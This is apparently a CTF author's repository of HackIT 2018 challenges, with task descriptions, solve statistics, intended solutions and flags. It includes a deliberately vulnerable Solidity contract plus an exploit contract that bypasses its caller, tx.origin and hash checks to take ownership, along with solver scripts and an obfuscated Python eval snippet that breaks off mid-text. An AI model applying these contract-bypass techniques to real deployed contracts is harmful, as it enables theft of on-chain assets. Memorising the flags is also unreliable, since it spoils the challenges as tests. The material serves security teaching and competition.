├── .gitattributes ├── Bulwarck ├── README.md ├── bulwarck.sol └── solution │ ├── README.md │ └── solution.sol ├── Get Going ├── README.md ├── index.html └── solution │ └── README.md ├── Inves2gate ├── README.md ├── challenge-misc01.png └── solution │ └── README.md ├── README.md ├── Smartpher ├── README.md ├── message.txt ├── smartpher.bytecode └── solution │ ├── README.md │ ├── rotcustom.sol │ ├── smartpher.abi │ └── solve.py └── TrapOSaur ├── README.md ├── misc03.pyc └── solution └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /Bulwarck/README.md: -------------------------------------------------------------------------------- 1 | # Bulwarck 2 | 3 | ## Task Description : 4 | ``` 5 | We need to cross the bulwarck to get back control of our assets. Hope it's not too high for you. 6 | 7 | Challenge: http://185.168.131.130:3000/ 8 | 9 | Submission Server: nc 185.168.131.130 1338 10 | 11 | Note: Please allow 5 minutes between solving and submission for flag 12 | ``` 13 | 14 | ## Tags: `Blockchain, EVM, Solidity` 15 | 16 | ### Level of difficulty: Medium-Hard 17 | 18 | ### Solve Stats : 19 | 1/670 registered team 20 | 21 | 1/123 team who scored atleast 1 point 22 | -------------------------------------------------------------------------------- /Bulwarck/bulwarck.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.18; 2 | 3 | contract Bulwarck{ 4 | uint points; 5 | address public owner; 6 | string public x; 7 | string public y; 8 | 9 | function Bulwarck(string _x, string _y) 10 | { 11 | owner = msg.sender; 12 | x = _x; 13 | y = _y; 14 | } 15 | 16 | function blooper(address addr) private returns(bool) 17 | { 18 | uint x; 19 | assembly { x := extcodesize(caller) } 20 | return x == 0; 21 | } 22 | 23 | function check(string a, string b) private returns(bool){ 24 | if(keccak256(x)==keccak256(a) || keccak256(y)==keccak256(b)){ 25 | return false; 26 | }else{ 27 | if( keccak256(x,y) == keccak256(a,b)){ 28 | return true; 29 | }else{ 30 | return false; 31 | } 32 | } 33 | } 34 | 35 | function jumpOver(bytes8 key, string x, string y) 36 | { 37 | require(msg.sender != tx.origin); 38 | require(blooper(msg.sender)); 39 | require(uint32(key) != uint64(key)); 40 | require(uint32(key) == uint16(tx.origin)); 41 | require(check(x,y)); 42 | 43 | owner = tx.origin; 44 | } 45 | } -------------------------------------------------------------------------------- /Bulwarck/solution/README.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | 1.) Review the Source Code 4 | 5 | 2.) Create a `constructor` to execute exploit code to bypass `blooper` function 6 | 7 | 3.) Use another smart contract to exploit the challenge contract to bypass origin validation 8 | 9 | 4.) Use the last 8 bits to bypass other check. 10 | 11 | 5.) keccak("aaa","ppp") == keccak("aaap","pp") will always return TRUE. That trick is utilized here. 12 | 13 | 6.) Run the Exploit code & You will become owner 14 | -------------------------------------------------------------------------------- /Bulwarck/solution/solution.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.18; 2 | 3 | contract Bulwarck{ 4 | uint points; 5 | address public owner; 6 | string public x; 7 | string public y; 8 | 9 | function Bulwarck(string _x, string _y) 10 | { 11 | owner = msg.sender; 12 | x = _x; 13 | y = _y; 14 | } 15 | 16 | function blooper(address addr) private returns(bool) 17 | { 18 | uint x; 19 | assembly { x := extcodesize(caller) } 20 | return x == 0; 21 | } 22 | 23 | function check(string a, string b) private returns(bool){ 24 | if(keccak256(x)==keccak256(a) || keccak256(y)==keccak256(b)){ 25 | return false; 26 | }else{ 27 | if( keccak256(x,y) == keccak256(a,b)){ 28 | return true; 29 | }else{ 30 | return false; 31 | } 32 | } 33 | } 34 | 35 | function jumpOver(bytes8 key, string x, string y) 36 | { 37 | require(msg.sender != tx.origin); 38 | require(blooper(msg.sender)); 39 | require(uint32(key) != uint64(key)); 40 | require(uint32(key) == uint16(tx.origin)); 41 | require(check(x,y)); 42 | 43 | owner = tx.origin; 44 | } 45 | } 46 | 47 | contract Hack_Bulwarck { 48 | 49 | address public target = address; // Replace it 50 | bytes8 public _gateKey = bytes8(tx.origin) & 0xFFFFFFFF0000FFFF; 51 | string x="listen to man"; 52 | string y="yspeak to few"; 53 | constructor() 54 | { 55 | Bulwarck b = Bulwarck(target); 56 | b.jumpOver(_gateKey,x,y); 57 | } 58 | } -------------------------------------------------------------------------------- /Get Going/README.md: -------------------------------------------------------------------------------- 1 | # Get Going 2 | 3 | ### Task-Description: 4 | It is the content of index.html file 5 | 6 | ### Tags: `Steganography, Zero Width, Unicode` 7 | 8 | ### Difficulty : Easy-Medium 9 | 10 | ### Solution statistics: 11 | 65/123 teams who did atleast one point 12 | 65/670 overall teams 13 | -------------------------------------------------------------------------------- /Get Going/index.html: -------------------------------------------------------------------------------- 1 | W​​​​‏​‍​​​​‏‌‎​​​​‎‏‍​​​​‏​‎​​​​‏‏‎​​​​‏‎‏​​​​‍​‌​​​​‎‏​​​​​‏​‎​​​​‏‍‏​​​​‍​‌​​​​‍​‌​​​​‍‌​​​​​‎‏​​​​​‏​‏​​​​‍​‍​​​​‎‏‏​​​​‏‌‍​​​​‍​‌​​​​‏‍‏​​​​‏‏‍​​​​‎‏​​​​​‏‎‏​​​​‌‏‏​​​​‏‎‌​​​​‏​‏​​​​‎‏​​​​​‏‎‍​​​​‏‍​​​​​‌‏‏​​​​‎‏‏​​​​‌‏‎​​​​‏​​​​​​‍​‌​​​‌​​​elcome to the HackIT 2018 CTF, flag is somewhere here. ¯_(ツ)_/¯ 2 | -------------------------------------------------------------------------------- /Get Going/solution/README.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | This concept is called 'Zero-Width Steganography' which has not been covered in any CTFs, There is a library for decoding https://github.com/offdev/zwsp-steg-js or can be manually decoded. 4 | There is nothing to guess, as Intention is players will open console & look at the ASCII text which isn't all ASCII but has unicode as well 5 | 6 | flag{w3_gr337_h4ck3rz_w1th_un1c0d3} 7 | -------------------------------------------------------------------------------- /Inves2gate/README.md: -------------------------------------------------------------------------------- 1 | # Inves2gate 2 | 3 | ### Task Description: 4 | ``` 5 | A trace of communication gave us this image. And also, we found some words like 'Rop$73N Network', 'Chopped em' & 'Peek my deployed contract'. Help us to make sense of all these findings 6 | Attachments: image 7 | ``` 8 | 9 | ### Tags : `EVM, Reverse Engineering` 10 | 11 | ### Difficulty: Medium 12 | 13 | ### Solution statistics: 14 | 3/670 overall teams 15 | 16 | 3/123 who had atleast 1 point 17 | 18 | -------------------------------------------------------------------------------- /Inves2gate/challenge-misc01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aadityapurani/My-CTF-Challenges/26fedac88ca647fef197ff62c6169534a10811cd/Inves2gate/challenge-misc01.png -------------------------------------------------------------------------------- /Inves2gate/solution/README.md: -------------------------------------------------------------------------------- 1 | Part 1: https://ropsten.etherscan.io/tx/0xb61227a91466026ea2f2670bd7725ac00bd7eb198ed71799ecadb6de3647f91e 2 | (flag{5cann1ng_) 3 | 4 | Part 2: https://ropsten.etherscan.io/tx/0xc02fc19b9c2587af1d1aab6aef9093f4b5fca6a0731e373ab4b584bb15a0170e 5 | (wh013_bl0ckch41n_4) 6 | 7 | Part 3: https://ropsten.etherscan.io/tx/0x1bc37a84ae691623c4043457fd3084044354ee656d349213fd63e5da1450ac9e 8 | The contract 0xb4c5ef28a38ffbd1095cc8d1ba947fb0e9a61e4a has storage which needs to be leaked 9 | web3.eth.getStorageAt('0xb4c5ef28a38ffbd1095cc8d1ba947fb0e9a61e4a', 1, function(x, y) {alert(web3.toAscii(y))}); 10 | (ctf_fl4g_i5_4_skill) 11 | 12 | Part 4: https://ropsten.etherscan.io/tx/0xd4e690ebfeabc1d61fabc2eda20df666633d9caf466f3e0dafdcc5616035df52 13 | https://ropsten.etherscan.io/address/0x0ea92008f4ccc6295e99908e35469fe9ca63787d 14 | web3.eth.getStorageAt('0x0ea92008f4ccc6295e99908e35469fe9ca63787d', 0, function(x, y) {alert(web3.toAscii(y))}); 15 | (_to_nuture}) 16 | 17 | overall : flag{5cann1ng_wh013_bl0ckch41n_4ctf_fl4g_i5_4_skill_to_nuture} -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # My-CTF-Challenges 2 | 3 | Hi, I am Aaditya. This is the repo of CTF challenges I have authored. It contains challenge source code, explaination, author's intended solution & Task description along with statistics. 4 | 5 | I participate regularly in CTFs; currently under team `dcua`. Apart from that I do bug-hunting. My area of interests/expertise are Web, mobile application, Forensics & Blockchain/Crypto. Most of my challenges are focused on those, but I like to challenge my comfort zone. If you have any question about these challs, you can find me in following ways: 6 | 7 | https://twitter.com/aaditya_purani 8 | 9 | https://aadityapurani.com 10 | 11 | 12 | ## Table of Contents: 13 | 14 | * [pbCTF 2022]() 15 | * [In The End](/) - Web, Pwn (2 solves) 16 | * [Lord of the Flag: The Unfinished Chat](https://github.com/perfectblue/pbCTF-2021-challs/tree/master/web/pbchat) - Web (0 solves) 17 | 18 | * [pbCTF 2021]() 19 | * [pbcoin](https://gist.github.com/aadityapurani/9cdec7360701c34d3ae2fdc1d1d7a0b4) - Blockchain (1 solve) 20 | 21 | * [UTC CTF 2019]() 22 | * Tons of Challenges 23 | 24 | * [HackIT CTF 2018]() 25 | * [Bulwarck](/Bulwarck) - Blockchain 26 | * [Get Going](/Get%20Going) - Steganography 27 | * [Smartpher](/Smartpher) - Blockchain 28 | * [Trap-O-Saur](/TrapOSaur) - Steganography 29 | * [Inves2Gate](/Inves2Gate) - Blockchain 30 | 31 | 32 | #### Give this repo a star if you like them 33 | -------------------------------------------------------------------------------- /Smartpher/README.md: -------------------------------------------------------------------------------- 1 | # Smartpher 2 | 3 | ### Task Description: 4 | ``` 5 | We found this attached in one of the Wooble's mail communication chain. Can you unBlock the Chain ? 6 | 7 | Note: This challenge follows non-standard flag format, so use flag{...} before submitting 8 | ``` 9 | 10 | ### Tags: `EVM, RE` 11 | 12 | ### Difficulty : Hard 13 | 14 | ### Solution Statistics: 15 | 0/670 - Teams who registered 16 | 17 | 0/123 - Teams who scored atleast 1 point 18 | -------------------------------------------------------------------------------- /Smartpher/message.txt: -------------------------------------------------------------------------------- 1 | Hi Wooble hackers, 2 | I wrote a super secure message encryption system to secure our communication so that FeeNetwork couldn't get our secret access to the chamber. 3 | The code to our secret chamber access code is given below which I generated from our system 4 | 5 | tphzqh}v}uivyznwju 6 | 7 | I combined blockchain and crypto to make double sure everything is good. I attach you other file, but I was too lazy to finish it though. Also, to access the chamber please decrypt the above access code and wrap with flag{...} 8 | 9 | Thanks, 10 | Wooble Team -------------------------------------------------------------------------------- /Smartpher/smartpher.bytecode: -------------------------------------------------------------------------------- 1 | 608060405260043610610099576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680632981c3ff1461009e57806337c8bea0146101235780638c1da162146101be5780638d64b9a8146102275780638da5cb5b14610309578063c060ac5314610360578063d9c7f48a14610415578063ddc9b178146104f7578063e106fb4b146105d9575b600080fd5b3480156100aa57600080fd5b50610105600480360381019080803590602001908201803590602001908080601f01602080910402602001604051908101604052809392919081815260200183838082843782019150505050505091929192905050506106bb565b60405180826000191660001916815260200191505060405180910390f35b34801561012f57600080fd5b5061018a600480360381019080803590602001908201803590602001908080601f01602080910402602001604051908101604052809392919081815260200183838082843782019150505050505091929192905050506106ea565b60405180826bffffffffffffffffffffffff19166bffffffffffffffffffffffff1916815260200191505060405180910390f35b3480156101ca57600080fd5b50610225600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050610adc565b005b34801561023357600080fd5b5061028e600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050610b51565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156102ce5780820151818401526020810190506102b3565b50505050905090810190601f1680156102fb5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561031557600080fd5b5061031e610ff3565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561036c57600080fd5b5061039a60048036038101908080356bffffffffffffffffffffffff19169060200190929190505050611018565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156103da5780820151818401526020810190506103bf565b50505050905090810190601f1680156104075780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561042157600080fd5b5061047c600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050611220565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156104bc5780820151818401526020810190506104a1565b50505050905090810190601f1680156104e95780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561050357600080fd5b5061055e600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050611831565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561059e578082015181840152602081019050610583565b50505050905090810190601f1680156105cb5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156105e557600080fd5b50610640600480360381019080803590602001908201803590602001908080601f01602080910402602001604051908101604052809392919081815260200183838082843782019150505050505091929192905050506118f9565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015610680578082015181840152602081019050610665565b50505050905090810190601f1680156106ad5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6000807f576173207665727920626f72656420746f20696d706c656d656e742074686973905080915050919050565b600060e060020a60003504631605782b811461070557600080fd5b5060048035018035602082019150604067ffffffffffffffc0600183011601600982820310600181146107375761073e565b6040820191505b50776745230100efcdab890098badcfe001032547600c3d2e1f060005b82811015610a685760408186016000376040818503106001811461077e57610785565b6080828603535b5060408303811460018114610799576107a5565b60088502602051176020525b5060405b60808110156108275760408103516038820351186020820351600c83035118187c0100000001000000010000000100000001000000010000000100000001601f60020a8204167ffffffffefffffffefffffffefffffffefffffffefffffffefffffffefffffffe600283021617905080825250600c810190506107a9565b5060805b6101408110156108aa5760808103516070820351186040820351601883035118187c0300000003000000030000000300000003000000030000000300000003601e60020a8204167ffffffffcfffffffcfffffffcfffffffcfffffffcfffffffcfffffffcfffffffc60048302161790508082525060188101905061082b565b508160008060005b6050811015610a3a5760148104600081146108e45760018114610917576002811461093f576003811461097a5761099e565b602860020a8504605060020a860418935083607860020a860416935083602860020a8604189350635a827999925061099e565b605060020a8504607860020a860418935083602860020a8604189350636ed9eba1925061099e565b605060020a8504607860020a860417935083602860020a860416935083605060020a8604607860020a870416179350638f1bbcdc925061099e565b605060020a8504607860020a860418935083602860020a860418935063ca62c1d692505b50601f60bb60020a8504168063ffffffe0609b60020a87041617905080840190508063ffffffff861601905080830190508060e060020a60048402510401905060a060020a8102602860020a8604179450605060020a633fffffff605260020a87041663c0000000603260020a880416170277ffffffff00ffffffff000000000000ffffffff00ffffffff8616179450506001810190506108b2565b5077ffffffff00ffffffff00ffffffff00ffffffff00ffffffff83860116945050505060408101905061075b565b5063ffffffff811667ffffffff00000000600860020a8304166bffffffff0000000000000000601060020a8404166fffffffff000000000000000000000000601860020a85041673ffffffff00000000000000000000000000000000602060020a860416171717179050806000526014600cf35b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141515610b3757600080fd5b8060039080519060200190610b4d929190611907565b5050565b6060806000606060008060046003805460018160011615610100020316600290049050141515610b8057600080fd5b610c2360038054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610c195780601f10610bee57610100808354040283529160200191610c19565b820191906000526020600020905b815481529060010190602001808311610bfc57829003601f168201915b50505050506118f9565b9450610c2e856106ea565b9350610c3984611018565b925060405180807f346436343735326361646465366561303139373537653039636533373461613181526020017f62646261383164660000000000000000000000000000000000000000000000008152506028019050604051809103902060001916836040518082805190602001908083835b602083101515610cd15780518252602082019150602081019050602083039250610cac565b6001836020036101000a038019825116818451168082178552505050505050905001915050604051809103902060001916141515610d0e57600080fd5b600487511115610fe55760028751039150600390508660028303815181101515610d3457fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028783815181101515610d8d57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028260008154600181600116156101000203166002900481101515610df857fe5b815460011615610e175790600052602060002090602091828204019190065b9054901a7f01000000000000000000000000000000000000000000000000000000000000000218188783815181101515610e4d57fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a9053508660088303815181101515610e8e57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028760048403815181101515610eea57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028260028154600181600116156101000203166002900481101515610f5557fe5b815460011615610f745790600052602060002090602091828204019190065b9054901a7f01000000000000000000000000000000000000000000000000000000000000000218188760048403815181101515610fad57fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350869550610fe9565b6038565b5050505050919050565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6060806000806000606060146040519080825280601f01601f1916602001820160405280156110565781602001602082028038833980820191505090505b50945060009350600092505b601483101561112c578260080260020a876c01000000000000000000000000900402600102915060007f010000000000000000000000000000000000000000000000000000000000000002827effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614151561111f578185858151811015156110e657fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a90535083806001019450505b8280600101935050611062565b836040519080825280601f01601f19166020018201604052801561115f5781602001602082028038833980820191505090505b509050600092505b8383101561121357848381518110151561117d57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f01000000000000000000000000000000000000000000000000000000000000000281848151811015156111d657fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a9053508280600101935050611167565b8095505050505050919050565b6060600060606000600c4314151561123757600080fd5b439250600a60405190808252806020026020018201604052801561126a5781602001602082028038833980820191505090505b5091506002602083015260186040830152600d606083015260116080830152600860a0830152600960c0830152600a60e08301526005610100830152600361012083015260076101408301523073ffffffffffffffffffffffffffffffffffffffff1663ddc9b178866040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004018080602001828103825283818151815260200191508051906020019080838360005b8381101561133e578082015181840152602081019050611323565b50505050905090810190601f16801561136b5780820380516001836020036101000a031916815260200191505b5092505050600060405180830381600087803b15801561138a57600080fd5b505af115801561139e573d6000803e3d6000fd5b505050506040513d6000823e3d601f19601f8201168201806040525060208110156113c857600080fd5b8101908080516401000000008111156113e057600080fd5b828101905060208101848111156113f657600080fd5b815185600182028301116401000000008211171561141357600080fd5b505092919050505060019080519060200190611430929190611907565b50600160029080546001816001161561010002031660029004611454929190611987565b50600090505b60028054600181600116156101000203166002900490508110156115cf57827f01000000000000000000000000000000000000000000000000000000000000000282600a600384018115156114ab57fe5b068151811015156114b857fe5b906020019060200201517f010000000000000000000000000000000000000000000000000000000000000002600283815460018160011615610100020316600290048110151561150457fe5b8154600116156115235790600052602060002090602091828204019190065b9054901a7f0100000000000000000000000000000000000000000000000000000000000000021818600282815460018160011615610100020316600290048110151561156b57fe5b81546001161561158a5790600052602060002090602091828204019190065b601f036101000a81548160ff021916907f010000000000000000000000000000000000000000000000000000000000000084040217905550808060010191505061145a565b3073ffffffffffffffffffffffffffffffffffffffff16638d64b9a860026040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180806020018281038252838181546001816001161561010002031660029004815260200191508054600181600116156101000203166002900480156116a15780601f10611676576101008083540402835291602001916116a1565b820191906000526020600020905b81548152906001019060200180831161168457829003601f168201915b505092505050600060405180830381600087803b1580156116c157600080fd5b505af11580156116d5573d6000803e3d6000fd5b505050506040513d6000823e3d601f19601f8201168201806040525060208110156116ff57600080fd5b81019080805164010000000081111561171757600080fd5b8281019050602081018481111561172d57600080fd5b815185600182028301116401000000008211171561174a57600080fd5b505092919050505060029080519060200190611767929190611a0e565b5060026001908054600181600116156101000203166002900461178b929190611a8e565b5060018054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156118225780601f106117f757610100808354040283529160200191611822565b820191906000526020600020905b81548152906001019060200180831161180557829003601f168201915b50505050509350505050919050565b6060600080600084519250600091505b828260ff1610156118ee57848260ff1681518110151561185d57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f01000000000000000000000000000000000000000000000000000000000000000290508060001a9050607b8110606d821116156118c85780607a0360600390505b6020811415156118e15760138101600183026020870101535b8180600101925050611841565b849350505050919050565b606060208201519050919050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061194857805160ff1916838001178555611976565b82800160010185558215611976579182015b8281111561197557825182559160200191906001019061195a565b5b5090506119839190611b15565b5090565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f106119c057805485556119fd565b828001600101855582156119fd57600052602060002091601f016020900482015b828111156119fc5782548255916001019190600101906119e1565b5b509050611a0a9190611b15565b5090565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10611a4f57805160ff1916838001178555611a7d565b82800160010185558215611a7d579182015b82811115611a7c578251825591602001919060010190611a61565b5b509050611a8a9190611b15565b5090565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10611ac75780548555611b04565b82800160010185558215611b0457600052602060002091601f016020900482015b82811115611b03578254825591600101919060010190611ae8565b5b509050611b119190611b15565b5090565b611b3791905b80821115611b33576000816000905550600101611b1b565b5090565b905600a165627a7a723058209843f9ca8cd0382bb0618c4af2822bfca226f69ebe755bb5e49fb5483022a1070029 -------------------------------------------------------------------------------- /Smartpher/solution/README.md: -------------------------------------------------------------------------------- 1 | Step 1: Reverse the EVM file and figure out the encryption function. 2 | 3 | Step 2: Retrieve and Brute force the seed given the SHA-1 Hash & seed.length == 4 4 | 5 | Step 3: Use the solve.py to retrieve the half-decrypted hash by implementing decryption routine. 6 | 7 | Step 4: Now, implement the custom reverse of ROT-19 encoding which solidity code has implemented. Using online ROT-7 will provide wrong decryption as author has tweaked the ROT-19 Algorithm during encryption process. 8 | 9 | Step 5: Append the retrieved plain-text with flag{...} and submit to receive points 10 | 11 | Detailed explaination in solve.py file. 12 | 13 | flag{patiencepaaysineth} -------------------------------------------------------------------------------- /Smartpher/solution/rotcustom.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.4.24; 2 | 3 | contract rotcustom{ 4 | 5 | function rotDecryptionCustom(string text) view public returns(string) { 6 | uint256 length = bytes(text).length; 7 | for (var i = 0; i < length; i++) { 8 | byte char = bytes(text)[i]; 9 | assembly { 10 | char := byte(0,char) 11 | if and(gt(char,0x60), lt(char,0x6E)) 12 | { char:= add(0x7B, sub(char,0x61)) } 13 | if iszero(eq(char, 0x20)) 14 | {mstore8(add(add(text,0x20), mul(i,1)), sub(char,19))} 15 | } 16 | } 17 | return text; 18 | } 19 | 20 | } -------------------------------------------------------------------------------- /Smartpher/solution/smartpher.abi: -------------------------------------------------------------------------------- 1 | [{"constant":true,"inputs":[{"name":"text","type":"string"}],"name":"Decrypt","outputs":[{"name":"","type":"bytes32"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"message","type":"bytes"}],"name":"laala","outputs":[{"name":"ret","type":"bytes20"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_seed","type":"string"}],"name":"setseed","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"feed","type":"bytes"}],"name":"aXeJ","outputs":[{"name":"","type":"bytes"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"x","type":"bytes20"}],"name":"bytes20ToString","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"text","type":"string"}],"name":"zMx","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"text","type":"string"}],"name":"Crp","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"source","type":"string"}],"name":"stringToBytes","outputs":[{"name":"result","type":"bytes"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"}]); -------------------------------------------------------------------------------- /Smartpher/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ''' 3 | Implemented by Aaditya Purani (@aaditya_purani) 4 | There are three functions calling each both are encryption routine. 5 | First function has in-memory array written in inline assembly 6 | In zMx function, it takes plain-text as input checks block.number == 12 7 | Encryption routine in zMx utilizes it and performs calculation along with memory arr 8 | Output is passed to Crp function, which has custom rot-19 implementation 9 | then it is feeded into aXeJ which takes input as bytes and perform require check with seed owner sets 10 | As this is static bytecode, seed cannot be retrieved from bytecode. So we want players to brute seed given sha1 hash & requirements 11 | seed should be exactly 4 length which is given out in one require(bytes(seed).length == 4); checks 12 | Then implement xor checks for aXeJ function 13 | Now, to decrypt implement in reverse given below 14 | ''' 15 | cipher = "tphzqh}v}uivyznwju" # Provided in message.txt 16 | len_cipher = len(cipher) 17 | offset = len_cipher - 2 18 | cipher = list(cipher) 19 | seed = "bcmz" # Must be retrieved by bruteforce of SHA-1 Hash provided in bytecode 4d64752cadde6ea019757e09ce374aa1bdba81df 20 | cipher[offset] = chr(ord(seed[0]) ^ ord(cipher[offset])^ ord(cipher[offset-2])) 21 | cipher[offset-4] = chr(ord(seed[2]) ^ ord(cipher[offset-4]) ^ ord(cipher[offset-8])) 22 | arr_num = [2, 24, 13, 17,8, 9, 10, 5, 3, 7] # Must be retrieved carefully from memory array 23 | blk_num = 12 24 | for i in xrange(0, len_cipher): 25 | cipher[i] = chr((ord(cipher[i])^arr_num[(i+3)%10])^(12)) 26 | print "".join(cipher) 27 | 28 | # Use the rotcustom.sol to decrypt it further -------------------------------------------------------------------------------- /TrapOSaur/README.md: -------------------------------------------------------------------------------- 1 | # Trap-O-Saur 2 | 3 | Python3.6 bytecode is given, Most likely players will try to RE the bytecode. After successful RE using uncompyle6 to python. Players will try to unobfuscate a code. 4 | A critical section after unobfuscation 5 | 6 | ``` 7 | eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+str((+all([[]])))+')')+'e'+eval('str(eval)[eval(str((+all([])))+str((+all([[]]))))]')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval('str(eval)[eval(str((+all([])))+str((+all([[]]))))]')+'('+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((all([])+all([])))+str((+all([[]])))+')')+')'+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str